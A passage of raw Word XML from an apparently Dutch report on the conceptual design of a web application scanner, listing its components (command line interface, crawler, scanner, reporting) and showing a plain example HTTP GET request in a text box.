BMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54&#10;bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJl&#10;bHNQSwECLQAUAAYACAAAACEA8nGWUpsCAADCBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwECLQAUAAYACAAAACEA8pihj90AAAALAQAADwAAAAAAAAAAAAAAAADzBAAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAP0FAAAAAA==&#10;" adj="16320,20280,5400" fillcolor="#e7e6e6 [3214]" strokecolor="black [3213]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00191685">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251889664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7395A2B7" wp14:editId="67B08828">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-76200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>698500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5867400" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="209" name="Text Box 209"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="58674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C90156" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="003C097E">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t xml:space="preserve">GET </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>account</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>-</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>status</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="800080"/>
                              </w:rPr>
                              <w:t>?</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>id</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>id HTTP</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                              <w:t>1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0D3718E1" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4B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95A2B7" id="Text Box 209" o:spid="_x0000_s1085" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-6pt;margin-top:55pt;width:462pt;height:27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Hu8IgCAACNBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI27VAI1LUgZgmVYAG&#10;E8+uY1Nrts+z3SbdX7+zk5SK8cK0l+R897vvj4vL1miyEz4osBUdn4woEZZDrexzRX883nw6pyRE&#10;ZmumwYqK7kWgl4uPHy4aV4oJbEDXwhM0YkPZuIpuYnRlUQS+EYaFE3DColCCNyzi0z8XtWcNWje6&#10;mIxGp0UDvnYeuAgBudedkC6yfSkFj3dSBhGJrijGFvPX5+86fYvFBSufPXMbxfsw2D9EYZiy6PRg&#10;6ppFRrZe/WXKKO4hgIwnHEwBUioucg6YzXj0KpuHDXMi54LFCe5QpvD/zPLb3b0nqq7oZDSnxDKD&#10;TXoUbSRfoCWJhxVqXCgR+OAQGlsUYKcHfkBmSryV3qQ/pkRQjrXeH+qbzHFkzs5Pz6YjFHGUfZ5O&#10;5kij+eJF2/kQvwowJBEV9di/XFa2W4XYQQdIcmbhRmmde6htYgTQqk68/EhDJK60JzuG7Y9tDhq9&#10;HaHw1WmKPCy9l5Rwl1im4l6LZFDb70JisXJ+b3hgnAsbBy8ZnVAS43mPYo9Pql1U71E+aGTPYONB&#10;2SgLPlczb9dLYeqfQ8iyw2NLjvJOZGzXbZ6S2WRo/BrqPc6Dh26nguM3Cpu2YiHeM49LhH3GwxDv&#10;8CM1NBWFnqJkA/73W/yEx9lGKSUNLmVFw68t84IS/c3i1M/H02na4vyYzs4m+PDHkvWxxG7NFWDj&#10;x3iCHM9kwkc9kNKDecL7sUxeUcQsR984KQN5FbtTgfeHi+Uyg3BvHYsr++B4Mp3KnEbysX1i3vVz&#10;G3Hib2FYX1a+Gt8OmzQtLLcRpMqznQrdVbVvAO583o7+PqWjcvzOqJcruvgDAAD//wMAUEsDBBQA&#10;BgAIAAAAIQBY7wki3wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTE9NT8JAEL2b+B82Y+INdktM&#10;1dItUQiJIXgADPG4dIe2sTvbdBco/97Ri97mfeTNe/lscK04Yx8aTxqSsQKBVHrbUKXhY7ccPYEI&#10;0ZA1rSfUcMUAs+L2JjeZ9Rfa4HkbK8EhFDKjoY6xy6QMZY3OhLHvkFg7+t6ZyLCvpO3NhcNdKydK&#10;pdKZhvhDbTqc11h+bU9Ow9vuuto8zt9Tt3pdfK73MuyXi7XW93fDyxRExCH+meGnPleHgjsd/Ils&#10;EK2GUTLhLZGFRPHBjudf5sBM+qBAFrn8v6H4BgAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAA&#10;AOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAh&#10;ACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAh&#10;AD4x7vCIAgAAjQUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgA&#10;AAAhAFjvCSLfAAAACwEAAA8AAAAAAAAAAAAAAAAA4AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAA&#10;BAAEAPMAAADsBQAAAAA=&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="77C90156" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="003C097E">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t xml:space="preserve">GET </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>account</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>-</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>status</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="800080"/>
                        </w:rPr>
                        <w:t>?</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>id</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>id HTTP</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                        <w:t>1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0D3718E1" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00710940">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2C57B5" w14:textId="5863DEEB" w:rsidR="006E3A79" w:rsidRPr="003D45FB" w:rsidRDefault="009276BC" w:rsidP="006E3A79">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc491022082"/>
      <w:r w:rsidRPr="003D45FB">
        <w:lastRenderedPageBreak/>
        <w:t>4.4</w:t>
      </w:r>
      <w:r w:rsidR="006E3A79" w:rsidRPr="003D45FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="10AC6DEF" w14:textId="76157D32" w:rsidR="006E3A79" w:rsidRDefault="00DE026A" w:rsidP="006E3A79">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252009472" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3170D29D" wp14:editId="504C96CB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5652135" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="37465" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="251" name="Text Box 251"/>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A0A637" w14:textId="5789C8F8" w:rsidR="00CE4BB5" w:rsidRPr="00AA65F4" w:rsidRDefault="00CE4BB5" w:rsidP="00DE026A">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Business </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Doel</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">Web Applicatie Scanner, </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Crawler</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>, Scanner, Rapporteren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70D29D" id="Text Box 251" o:spid="_x0000_s1086" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:24pt;width:445.05pt;height:27pt;z-index:25200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Bul4oCAACNBQAADgAAAGRycy9lMm9Eb2MueG1srFRLbxoxEL5X6n+wfC8LBNIGZYkoEVUllERN&#10;qpyN1w5WbY9rG3bpr8/Yu0tQmkuqXnbH8358M5dXjdFkL3xQYEs6GgwpEZZDpexTSX8+rD59oSRE&#10;ZiumwYqSHkSgV/OPHy5rNxNj2IKuhCfoxIZZ7Uq6jdHNiiLwrTAsDMAJi0IJ3rCIT/9UVJ7V6N3o&#10;Yjwcnhc1+Mp54CIE5F63QjrP/qUUPN5KGUQkuqSYW8xfn7+b9C3ml2z25JnbKt6lwf4hC8OUxaBH&#10;V9csMrLz6i9XRnEPAWQccDAFSKm4yDVgNaPhq2rut8yJXAs2J7hjm8L/c8tv9neeqKqk4+mIEssM&#10;DulBNJF8hYYkHnaodmGGivcOVWODApx0zw/ITIU30pv0x5IIyrHXh2N/kzuOzOn5dDw6m1LCUXY2&#10;GV8M8wCKF2vnQ/wmwJBElNTj/HJb2X4dImaCqr1KCmZhpbTOM9Q2MQJoVSVefiQQiaX2ZM9w/LHJ&#10;SaOLEy18tZYig6WLkgpuC8tUPGiRHGr7Q0hsVq7vjQiMc2FjHyVrJy2J+bzHsNNPpm1W7zE+WuTI&#10;YOPR2CgLPnczb9dLY6pffcqy1cc+n9SdyNhsmoyS6Vk/+A1UB8SDh3anguMrhUNbsxDvmMclQgjg&#10;YYi3+JEa6pJCR1GyBf/nLX7SR2yjlJIal7Kk4feOeUGJ/m4R9RejySRtcX5Mpp/H+PCnks2pxO7M&#10;EnDwiGvMLpNJP+qelB7MI96PRYqKImY5xkak9OQytqcC7w8Xi0VWwr11LK7tvePJdWpzguRD88i8&#10;63AbEfE30K8vm72Cb6ubLC0sdhGkythOjW672g0Adz5DvrtP6aicvrPWyxWdPwMAAP//AwBQSwME&#10;FAAGAAgAAAAhAPsmGcLfAAAABwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FrwkAQhe+C/2EZoTfd&#10;VYpN02ykVYQielCL9Lhmp0lodjZkV43/vtNTe3oM7/HeN9mid424YhdqTxqmEwUCqfC2plLDx3E9&#10;TkCEaMiaxhNquGOART4cZCa1/kZ7vB5iKbiEQmo0VDG2qZShqNCZMPEtEntfvnMm8tmV0nbmxuWu&#10;kTOl5tKZmnihMi0uKyy+Dxen4f143+yflru527ytPrcnGU7r1Vbrh1H/+gIiYh//wvCLz+iQM9PZ&#10;X8gG0WjgR6KGx4SV3eRZTUGcOaZmCmSeyf/8+Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7&#10;AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA&#10;ACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA&#10;ACEAQtBul4oCAACNBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA&#10;CAAAACEA+yYZwt8AAAAHAQAADwAAAAAAAAAAAAAAAADiBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA&#10;AAAEAAQA8wAAAO4FAAAAAA==&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="68A0A637" w14:textId="5789C8F8" w:rsidR="00CE4BB5" w:rsidRPr="00AA65F4" w:rsidRDefault="00CE4BB5" w:rsidP="00DE026A">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Business </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Doel</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">Web Applicatie Scanner, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Crawler</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>, Scanner, Rapporteren</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F431DF6" w14:textId="0F7CF623" w:rsidR="00982F21" w:rsidRPr="00976386" w:rsidRDefault="00F71C6B" w:rsidP="006E3A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00976386">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Introductie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68152D6F" w14:textId="5231434B" w:rsidR="00F71C6B" w:rsidRDefault="00315691" w:rsidP="006E3A79">
      <w:r>
        <w:t xml:space="preserve">In dit deel zal ik inzoomen op het conceptuele ontwerp van de </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="000900D0">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E3472A">
        <w:t xml:space="preserve">Zoals </w:t>
      </w:r>
      <w:r w:rsidR="00652090">
        <w:t xml:space="preserve">eerder, in de inleiding van dit hoofdstuk vermelde ik wat de kerncomponenten zijn </w:t>
      </w:r>
      <w:r w:rsidR="00E52E20">
        <w:t>van een Web Applicatie Scanner.</w:t>
      </w:r>
      <w:r w:rsidR="003B0D65">
        <w:t xml:space="preserve"> De database heb ik eruit </w:t>
      </w:r>
      <w:r w:rsidR="00A67C2C">
        <w:t>gelaten omda</w:t>
      </w:r>
      <w:r w:rsidR="0022082C">
        <w:t>t het een t</w:t>
      </w:r>
      <w:r w:rsidR="00DC610A">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00C87950">
        <w:t xml:space="preserve">t een ander </w:t>
      </w:r>
      <w:r w:rsidR="00D52C84">
        <w:t>subsysteem behoort.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1307"/>
        <w:gridCol w:w="2461"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D37B7" w14:paraId="03D3583E" w14:textId="77777777" w:rsidTr="002D37B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1307" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EA073DD" w14:textId="77777777" w:rsidR="00E52E20" w:rsidRDefault="00E52E20" w:rsidP="00931708">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C898C2C" w14:textId="77777777" w:rsidR="00E52E20" w:rsidRDefault="00E52E20" w:rsidP="00931708">
            <w:r>
              <w:t>Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C105F0" w14:paraId="4FF9F6AF" w14:textId="77777777" w:rsidTr="002D37B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1307" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43A3122F" w14:textId="247C8721" w:rsidR="00C105F0" w:rsidRDefault="00C105F0" w:rsidP="00931708">
            <w:r>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61FD5D87" w14:textId="2DA9682C" w:rsidR="00C105F0" w:rsidRDefault="002E7F33" w:rsidP="00931708">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Command</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Line Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D37B7" w14:paraId="517324E8" w14:textId="77777777" w:rsidTr="002D37B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1307" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DECF759" w14:textId="5E6D3F15" w:rsidR="00E52E20" w:rsidRDefault="002D37B7" w:rsidP="00931708">
            <w:r>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66D9ED58" w14:textId="1761992C" w:rsidR="00E52E20" w:rsidRDefault="00E52E20" w:rsidP="00931708">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Crawler</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D37B7" w14:paraId="21946753" w14:textId="77777777" w:rsidTr="002D37B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1307" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="495BAD40" w14:textId="4200854B" w:rsidR="00E52E20" w:rsidRDefault="002D37B7" w:rsidP="00931708">
            <w:r>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D124957" w14:textId="77777777" w:rsidR="00E52E20" w:rsidRDefault="00E52E20" w:rsidP="00931708">
            <w:r>
              <w:t>Scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D37B7" w14:paraId="5B7702F3" w14:textId="77777777" w:rsidTr="002D37B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1307" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5456D34F" w14:textId="2034DE57" w:rsidR="00E52E20" w:rsidRDefault="002D37B7" w:rsidP="00931708">
            <w:r>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2461" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21F552D2" w14:textId="77777777" w:rsidR="00E52E20" w:rsidRDefault="00E52E20" w:rsidP="00931708">
            <w:r>
              <w:t>Rapporteren</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D09F3B6" w14:textId="1C5B8C2B" w:rsidR="00813F26" w:rsidRDefault="00086EA1" w:rsidP="006E3A79">
      <w:r>
        <w:t>Tabel 4.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326BC09A" w14:textId="14BF2BD7" w:rsidR="00E52E20" w:rsidRDefault="00DD74BB" w:rsidP="006E3A79">
      <w:r>
        <w:t>Commando’s en controle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450FF6D6" w14:textId="77777777" w:rsidR="001432D5" w:rsidRDefault="00003C60" w:rsidP="006E3A79">
      <w:r>
        <w:t xml:space="preserve">Een Web Applicatie Scanner, zoals iedere </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>software applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00704622">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00675699">
        <w:t xml:space="preserve">heeft een interface nodig </w:t>
      </w:r>
      <w:r w:rsidR="00704622">
        <w:t>die de</w:t>
      </w:r>
      <w:r w:rsidR="00675699">
        <w:t xml:space="preserve"> processen binnen de applicatie </w:t>
      </w:r>
      <w:r w:rsidR="00704622">
        <w:t xml:space="preserve">start en </w:t>
      </w:r>
      <w:r w:rsidR="00675699">
        <w:t>aansturen.</w:t>
      </w:r>
      <w:r w:rsidR="009B4F3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A60266">
        <w:t xml:space="preserve">De Web Applicatie Scanner </w:t>
      </w:r>
      <w:r w:rsidR="00734469">
        <w:t xml:space="preserve">heeft als interface een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00734469">
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00734469">
        <w:t xml:space="preserve"> Line Interface (CLI)</w:t>
      </w:r>
      <w:r w:rsidR="00BB4B03">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C4112C">
        <w:t>CLI’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C4112C">
        <w:t xml:space="preserve"> bestaan uit een lijst van commando’s die de gebru</w:t>
      </w:r>
      <w:r w:rsidR="00BE5996">
        <w:t xml:space="preserve">iker kan uitvoeren een Terminal. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECDA9B6" w14:textId="4E79E3F2" w:rsidR="001432D5" w:rsidRDefault="001432D5" w:rsidP="006E3A79">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="190CEF9A" w14:textId="0ACDC945" w:rsidR="00BF1E2B" w:rsidRDefault="002C6EDA" w:rsidP="006E3A79">
      <w:r>
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00830DBB">
        <w:t xml:space="preserve">is een programmeer script dat in verschillende </w:t>
      </w:r>
      <w:r w:rsidR="003A3900">
        <w:t xml:space="preserve">High Level </w:t>
      </w:r>
      <w:r w:rsidR="00EA3454">
        <w:t>programmeertalen</w:t>
      </w:r>
      <w:r w:rsidR="003A3900">
        <w:t xml:space="preserve"> geschreven kan worden. De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A3900">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00830DBB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0036259E">
        <w:t>doorzoekt de broncode van een website naar specifieke HTML DOM Elementen</w:t>
      </w:r>
      <w:r w:rsidR="003E1D0A">
        <w:t xml:space="preserve"> (Glossary, 11)</w:t>
      </w:r>
      <w:r w:rsidR="0036259E">
        <w:t xml:space="preserve">, zoals headers en paragrafen, deze worden gesymboliseerd met &lt;h&gt; en &lt;p&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C12D8A">
        <w:t>DOM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C12D8A">
        <w:t xml:space="preserve"> elementen.</w:t>
      </w:r>
      <w:r w:rsidR="00261FB5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F4085">
        <w:t xml:space="preserve">Na het crawlen wordt er door de ontwikkelaars besloten </w:t>
      </w:r>
      <w:r w:rsidR="00BF1E2B">
        <w:t>wat er gedaan wor</w:t>
      </w:r>
      <w:r w:rsidR="0059527D">
        <w:t>dt met de data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FFC499" w14:textId="397EE280" w:rsidR="0059527D" w:rsidRDefault="0063183F" w:rsidP="006E3A79">
      <w:r>
        <w:t>Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548CD2C6" w14:textId="7750C942" w:rsidR="0063183F" w:rsidRDefault="00315E3B" w:rsidP="006E3A79">
      <w:r>
